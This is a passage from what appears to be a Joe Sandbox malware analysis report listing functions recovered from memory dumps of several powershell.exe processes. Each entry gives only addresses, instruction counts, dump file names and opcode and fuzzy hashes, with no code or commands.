Instruction Fuzzy Hash: 0921FC72F1FA494FE7ADAA1C6855278B6D1EF86655F8803BFC04EC3192DF189C094349

Function 00007FF848C880A4 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e44d841230b688f28d5adf97ce70d1fcad0267ec8ee7455c8f7a96153136fe2
Instruction ID: 299a912c227ff225312115dc464830ca807ecac49e0e1ae0ed8e96fa457ed136
Opcode Fuzzy Hash: 2e44d841230b688f28d5adf97ce70d1fcad0267ec8ee7455c8f7a96153136fe2
Instruction Fuzzy Hash: 8221E930B19A0D8FE798EB78C85977872E2FF89745B4040B9940ECB2A6DE39AC418700

Function 00007FF848C87CCA Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d58a3984f0f91b11b7cdf5ead418d16964d4ea6485d86e7defa8a77464ea3d3
Instruction ID: 758808b09bb5a88405bce355dd5dd6454bb966f61c6f5f3376d52d4a31d027d5
Opcode Fuzzy Hash: 9d58a3984f0f91b11b7cdf5ead418d16964d4ea6485d86e7defa8a77464ea3d3
Instruction Fuzzy Hash: 5A11B730A5D9854FE385F768882637837E2EF46745F5001B9D82EC72E3EE1C1C418B56

Function 00007FF848C85725 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
Instruction ID: c6e776b1d00290aaf3c1325437fd10032b6f1d9f814e63457321aa80cfcb8812
Opcode Fuzzy Hash: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
Instruction Fuzzy Hash: E001A73011CB0C8FD744EF0CE051AA6B7E0FB85364F10052DE58AC3651D736E881CB45

Function 00007FF848C88F5E Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285ff84c730328516bba6994da47670bfb3913f2f52820cd06fdb403fed966bd
Instruction ID: 1b4288c8aca61276217f874e239c699e8bac56de29797f73454e54a1cfb18d10
Opcode Fuzzy Hash: 285ff84c730328516bba6994da47670bfb3913f2f52820cd06fdb403fed966bd
Instruction Fuzzy Hash: B401F43074DA494FE389EA3888A52B63293DFC9791F1081BAD41BC73E7DE2C58019751

Function 00007FF848C8838F Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8d47abf644758186d703186f6626a286bb5ba42f79fee1b38071eb6c8fa14b
Instruction ID: 46ab36374a1f1a158d8c73ce21c3548d4ecc902d9994790d97d5e21e8174bfc3
Opcode Fuzzy Hash: 8c8d47abf644758186d703186f6626a286bb5ba42f79fee1b38071eb6c8fa14b
Instruction Fuzzy Hash: BDF0963066DA485FE34AA73C841523436E1EF89B81F5000BED80DC73E7DE296C428B96

Function 00007FF848C838D8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b694def646de92c6770dc6bc5d07d169b6758ce9bedb3495a8ba57723ba21a
Instruction ID: 0ef2a9755260de5aa4d950196ea509caeabb30f27ddf0ccedcea64161445b46c
Opcode Fuzzy Hash: c7b694def646de92c6770dc6bc5d07d169b6758ce9bedb3495a8ba57723ba21a
Instruction Fuzzy Hash: F9F0303275C6048FDB4CAA1CF8429B5B3D1EB99321F10016EE48BC2696D92BF842CA85

Function 00007FF848C87D45 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00f6d85948ce642796d828a8b8d790efc77bbb2bf9c1de1813b7a72417c3fa8
Instruction ID: ffd37e43a1b0de3ba1b210cbf30e80b33834ffa9e10656c50ee189bf582975b0
Opcode Fuzzy Hash: b00f6d85948ce642796d828a8b8d790efc77bbb2bf9c1de1813b7a72417c3fa8
Instruction Fuzzy Hash: 19F04430A5D5854FE39AF769845577836A1DF46385F5000B9D40DC72E3DF2D1C41CB56

Function 00007FF848C8840E Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3657d59ed4a384374ca31c907f1b2bec76b0a0825fe2c2d7299f2f9ddcdef5
Instruction ID: 512813f8462e74905256e0ceab4ce0d77a9ffb9310316b26a7023a0ca07fed51
Opcode Fuzzy Hash: 3a3657d59ed4a384374ca31c907f1b2bec76b0a0825fe2c2d7299f2f9ddcdef5
Instruction Fuzzy Hash: B8F0B42065C9444FE789E7388C6673437E2EF89785F1001BDD82BC73D3DE2818418B52

Function 00007FF848D5364A Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b42e6c121ae07b4ec628f7c5d163f5063803b25abadfb57ee9e4f46d7484eed
Instruction ID: daadb9c95a39e2912008d6d0267f81e0e0c8556f00fd687ead419f65f4496afc
Opcode Fuzzy Hash: 8b42e6c121ae07b4ec628f7c5d163f5063803b25abadfb57ee9e4f46d7484eed
Instruction Fuzzy Hash: 19E09222F0F92E0FF2AAF25C24197F8D2C1EF892A1FD401B7D80DD3286EE049C154289

Function 00007FF848C87975 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce43bffc4707631982079a35e1e57d03dc03385a17b2cca1c353f0167e9d9bf
Instruction ID: ddc76aa120416c8e919674bad1c2e9eee1ecbc263a89b06a2bdff2018dd14779
Opcode Fuzzy Hash: 1ce43bffc4707631982079a35e1e57d03dc03385a17b2cca1c353f0167e9d9bf
Instruction Fuzzy Hash: 47F0EC3179C4494FD348E634C8516753396DB89351F10837DD46FC72D3EF2858818A96

Function 00007FF848C88F2A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7ede9794aca9ffcb85b6df49f53cc4e85c41943111edc28180d686e1d6174a
Instruction ID: 2303df546ef44c0ddcb7c2c7c4e912f86e056184af7ea4f548d7719d06aba4b5
Opcode Fuzzy Hash: 0c7ede9794aca9ffcb85b6df49f53cc4e85c41943111edc28180d686e1d6174a
Instruction Fuzzy Hash: E4F0303074D9094FE345E62880996BA3293DFD9396F208576C40AC72EADE2D98469745

Function 00007FF848C88088 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7928784e08684f626e6fcab5309fd934c192ed4eed6ffc20bb274bb21ebb824d
Instruction ID: af702dab5cf5f9744c4f26d3d436497c66b9c67f8541a1cdf669a1fad9229ce5
Opcode Fuzzy Hash: 7928784e08684f626e6fcab5309fd934c192ed4eed6ffc20bb274bb21ebb824d
Instruction Fuzzy Hash: 11E0863168960A8FD794DB58C4846B933A2FB54352F20833AC00AC7296DF3D5806D784

Function 00007FF848C87A3D Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c368c93864ff1d7bc0de3b5af9e123066e4e011afef365157cfebd040083641
Instruction ID: 7c426063bf84d0607bdf311cd0c0416cf7e55a8194f274bb8f6d186134e7d015
Opcode Fuzzy Hash: 7c368c93864ff1d7bc0de3b5af9e123066e4e011afef365157cfebd040083641
Instruction Fuzzy Hash: 47D02B31BCC4068FD714B624DC405B53391D348351F008379C44BC2287FA3C98C045C6

Function 00007FF848C883EF Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf8a382f491b3a8328872aada4fff601e806fc89ce784f6968d36902f80652a
Instruction ID: 56fd8a00fa89a19258ace1526ed754611e64b734dd15d6b731cdae667cdce807
Opcode Fuzzy Hash: aaf8a382f491b3a8328872aada4fff601e806fc89ce784f6968d36902f80652a
Instruction Fuzzy Hash: ABC08C10E1C8014BE254A128A4062786280DF08BC2F200075EE0DC22DBDC182C63418D

Analysis Process: powershell.exePID: 6524, Parent PID: 1088COMMON

Executed Functions

Function 00007FF848D66605 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2726d7100ec766700c6ced5c5d7b42e32d9502d081d4884583b15acf8c13b3bd
Instruction ID: 57237cf421a3af76776cd9843fac8a7e8f6d351934a18b1a68d6c799b20435d3
Opcode Fuzzy Hash: 2726d7100ec766700c6ced5c5d7b42e32d9502d081d4884583b15acf8c13b3bd
Instruction Fuzzy Hash: CFD13471D0FA8E5FEB55AB7868546B57BE0EF162A4F0800FAE04DD70D3EB18A809C355

Function 00007FF848C99E18 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d71eb5ea15c3656e2f7d22f9da9f75d26fd5b23fc666c4f2e5e2976ea62a39
Instruction ID: 5fb8345fa1d4f6898f8dff9e43930bd42b5ff9afa15d0f7cc439a745e55a95bf
Opcode Fuzzy Hash: b0d71eb5ea15c3656e2f7d22f9da9f75d26fd5b23fc666c4f2e5e2976ea62a39
Instruction Fuzzy Hash: BCF05E3580CA8C8FDB95EF2898685E57FE0FF26205B1401EBE84DC7161DB21A958C785

Function 00007FF848C99868 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4639d4c9cf3dae17d093ccb82ca3ba020af210adf460e18a344bc8c328a3e3a1
Instruction ID: 1f57a517567b8fc783804b741f4c81f7b6d31709dcd18d66852e6ef4f808fd00
Opcode Fuzzy Hash: 4639d4c9cf3dae17d093ccb82ca3ba020af210adf460e18a344bc8c328a3e3a1
Instruction Fuzzy Hash: DC31E53190CB488FDB58DB5CA8066B97BE0FBA9710F00426FE44993651DB31A855CBC6

Function 00007FF848B7F360 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2860872004.00007FF848B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848b7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0fee6f73a2f65e931ba1308709eec403620e2b98a465b92515dbd64c4f775d
Instruction ID: e6c178c68b92c01565fa1ef7422e9b82a948e16f017bd36fd0072b0278139e74
Opcode Fuzzy Hash: 4a0fee6f73a2f65e931ba1308709eec403620e2b98a465b92515dbd64c4f775d
Instruction Fuzzy Hash: 8441577080DBC49FE7569B38A841A523FF0EF56320F0601DFD488CB5A7C725A84AC792

Function 00007FF848C9A471 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e00aa915d957e4cfddaf9c616dd036382bfe128f2acc94d66a816b3d4aa9d98b
Instruction ID: a42f022d6f6dd3cfa217469fee397848372dc958e673e7a211bc1f54c481f5df
Opcode Fuzzy Hash: e00aa915d957e4cfddaf9c616dd036382bfe128f2acc94d66a816b3d4aa9d98b
Instruction Fuzzy Hash: 4831E57190DB888FDB59DF68984A6E93FF0EFA6321F0441ABD048C7163D6399849CB52

Function 00007FF848C933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 0f03e15030260991588b1b2485b7051d7196598e140a677e60203f1b5ab13b1b
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 7101677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DB36E882CB45

Function 00007FF848D6414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb3670fd142af4759142e3194bf82ed724b8b37cdd28fb4e0447134ad8c2d4a
Instruction ID: 8cb0fc8bc71e2aced9cc2718f30f4a600ea3d1b4a35caa5df40c20c746a7b4a7
Opcode Fuzzy Hash: eeb3670fd142af4759142e3194bf82ed724b8b37cdd28fb4e0447134ad8c2d4a
Instruction Fuzzy Hash: 5BF0BE32A0D6098FE698EB4CE405AE873E1FF54360B1500BAE01DC71A3CB2AEC44C788

Function 00007FF848D64400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2953cf0b6c0ef3e9a3d77bd90a33ca2cbe58163aad0399d77657fd6920f5fc78
Instruction ID: 3cb9ffed048acfe8abb308dffeac1a01e3f6391423b2a8f3adbe1669150537f2
Opcode Fuzzy Hash: 2953cf0b6c0ef3e9a3d77bd90a33ca2cbe58163aad0399d77657fd6920f5fc78
Instruction Fuzzy Hash: 90F0BE31A0D5488FE755EB0CE446AE873E0FF04320B1500B6E009C7063DB26AC54C794

Function 00007FF848D641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 195463db7dc087f650cdcb4d8f594801fc5eb560f661ee5cc9053a1d5fb510fc
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 50E01A31B0C8088FDAA8EB0CE040AE973E2FB98371B1101B7E14ED7561CB26EC558B84

Function 00007FF848C9A3A9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71748acc3c01453aab5ad77b283be2f8662254592b61ed55f8a655d15498963f
Instruction ID: c16d75e5021a2106a33e6e1e4f4762b7f004811b66b5643d07648ffabfe5f592
Opcode Fuzzy Hash: 71748acc3c01453aab5ad77b283be2f8662254592b61ed55f8a655d15498963f
Instruction Fuzzy Hash: 42E01A35808A4C8FDB48EF2898595E97BA0FB68215F0042ABE80DC7121EB719958CBC2

Non-executed Functions

Function 00007FF848D63316 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcfa4a106956aa1cdbc1b71995a1fc14cf364fb43ee566f58a83bad968d20f76
Instruction ID: b0721e21651f4a91a47759ac147709c15e1e818fe279e5d6dbbeeedf9a2ce7bf
Opcode Fuzzy Hash: fcfa4a106956aa1cdbc1b71995a1fc14cf364fb43ee566f58a83bad968d20f76
Instruction Fuzzy Hash: 82B1F521D0EBCA0FE79BA63C1864271BFE1EF57650F0901FBD449D7193DA19AC0A835A

Function 00007FF848C98BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON

Download Yara Rule

Strings

K_^W, xrefs: 00007FF848C98C8A
K_^=, xrefs: 00007FF848C98BFA
K_^@, xrefs: 00007FF848C98C12
K_^T, xrefs: 00007FF848C98C72
K_^Y, xrefs: 00007FF848C98C9A
K_^U, xrefs: 00007FF848C98C7A

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID: K_^=$K_^@$K_^T$K_^U$K_^W$K_^Y
API String ID: 0-440027145
Opcode ID: 86c3768a94039caec6b132ffc58f392c1c7c0324f692fefc737e1f0a6517d45e
Instruction ID: fddba37290a318b1e8ad7ffec8022c39873526d1be95721ccadac0bda7e572c5
Opcode Fuzzy Hash: 86c3768a94039caec6b132ffc58f392c1c7c0324f692fefc737e1f0a6517d45e
Instruction Fuzzy Hash: A62165B37585257EDA0676ADF8412E83BD0EF912B174512F3C258DB103DD24A4878998

Function 00007FF848C984FA Relevance: 6.4, Strings: 5, Instructions: 100COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF848C9857A
K_^, xrefs: 00007FF848C9850A
K_^, xrefs: 00007FF848C9852A
K_^, xrefs: 00007FF848C9856A
K_^, xrefs: 00007FF848C984FA

Memory Dump Source

Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^$K_^
API String ID: 0-3188868157
Opcode ID: 2b24ddb36730c012f27860d4d80bef9697a42a4b939e3fdfc6113f16d73210f3
Instruction ID: c025dad802198a9660a71ae08b5114cc5c6302723cf0888f0532a7925039d9a7
Opcode Fuzzy Hash: 2b24ddb36730c012f27860d4d80bef9697a42a4b939e3fdfc6113f16d73210f3
Instruction Fuzzy Hash: 7F215573E0D9C29FF3D6A63D585909A2FD0FF627A8B0900F6D099C70B3FA15580B9615

Analysis Process: powershell.exePID: 6388, Parent PID: 1088COMMON

Executed Functions

Function 00007FF848D36605 Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

X7BR, xrefs: 00007FF848D367FD

Memory Dump Source

Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd

Similarity

API ID:
String ID: X7BR
API String ID: 0-1240667675
Opcode ID: 307fcdb4d0d7f525918269b39d1597fdf5c3efc0565d24588655997d17df2294
Instruction ID: f5b723892d3eccf12025af99146550ee17e718110798a428572a4a2edc621bce
Opcode Fuzzy Hash: 307fcdb4d0d7f525918269b39d1597fdf5c3efc0565d24588655997d17df2294
Instruction Fuzzy Hash: 4ED10171D0FB8A5FFB95AB2868156B57BE0EF162A4F1800FBD04DC70D3EA189809C365

Function 00007FF848C6A1AF Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1dd8699b25b8e9a4f5f8d8642d1f2eb5d2472c1f2024d83a75fd041057cb3e
Instruction ID: e72eae8234c7eb6a05205ad28048fac9f124fdb4415ac690675c3e814678e894
Opcode Fuzzy Hash: 3e1dd8699b25b8e9a4f5f8d8642d1f2eb5d2472c1f2024d83a75fd041057cb3e
Instruction Fuzzy Hash: F021AE7694D6CA8FD757EB6898660E43FA0FF12294F0800F7D58CCB063EA185859879A

Function 00007FF848C69DF8 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92aa960d0d38a44407c6e34b7307d7e8095447a88d7efe8683a84719a59c5f90
Instruction ID: fd48115555d4f2887e29001077d9c0c2c4811e18b40f4746a09a2164123c2f3b
Opcode Fuzzy Hash: 92aa960d0d38a44407c6e34b7307d7e8095447a88d7efe8683a84719a59c5f90
Instruction Fuzzy Hash: 4C11916180DBC64FDB879B748C255A57FB0FF17250F0901FBD488DB1A3DA199858C792

Function 00007FF848C6A230 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157d5a00bebe917f433e671beec53befc51af30d83f917bcf4723e18668d6268
Instruction ID: 0fe7ede4c84d307c161f79edab2bd12ce44e335da7c43848a86744b183a93354
Opcode Fuzzy Hash: 157d5a00bebe917f433e671beec53befc51af30d83f917bcf4723e18668d6268
Instruction Fuzzy Hash: E5F0317540D7C98FDB469F2498654947FB0EF16210B0901E7D489CB062D7659D58CB92

Function 00007FF848B4ED40 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2858176701.00007FF848B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848b4d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc1dcd9456ccd98cb6a1b95f7e4d8cb3c679f5e075128fadff047d5093d0052
Instruction ID: af6e7866be35129b8b332df75e39f9f32e80a67446e81f497c1251d766dadc7c
Opcode Fuzzy Hash: 2fc1dcd9456ccd98cb6a1b95f7e4d8cb3c679f5e075128fadff047d5093d0052
Instruction Fuzzy Hash: 6541043080DBC44FE7669B28AC429523FF0EF56320F1506DFD088CB5A7D729A846C7A2

Function 00007FF848C69898 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5119785464e7533f11dbed727f9b7fea67062063727b8d3aa7189f03bc0dde43
Instruction ID: 7929ccf5c76308467ab1832e8d6a048e4a9abec8ae5cd31f045cd8da04af4929
Opcode Fuzzy Hash: 5119785464e7533f11dbed727f9b7fea67062063727b8d3aa7189f03bc0dde43
Instruction Fuzzy Hash: 9931C53091CB488FDB58DB5CA8466A9B7E0FB98711F00422FE44DD3252DB71A855CBC2

Function 00007FF848C6A491 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2645dabea9e1e5fe91e50606db418dae5834ccfa1fc10c24fd9d5e5a6f60df28
Instruction ID: f3762684306278421aa5aaad1f60bc2653aa111b439f63dc36c9498f68466fe2
Opcode Fuzzy Hash: 2645dabea9e1e5fe91e50606db418dae5834ccfa1fc10c24fd9d5e5a6f60df28
Instruction Fuzzy Hash: F231D47190D7884FDB59DF68984A7E97FF0EF96321F0441AFD048C7162D638A84ACB51

Function 00007FF848C633B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 4eb2ada9ab29e622916c17807bfbfc79cc04b2bc1181a3ef9b684f0d4e271a07
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 7001677115CB0D4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB45

Function 00007FF848D3414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

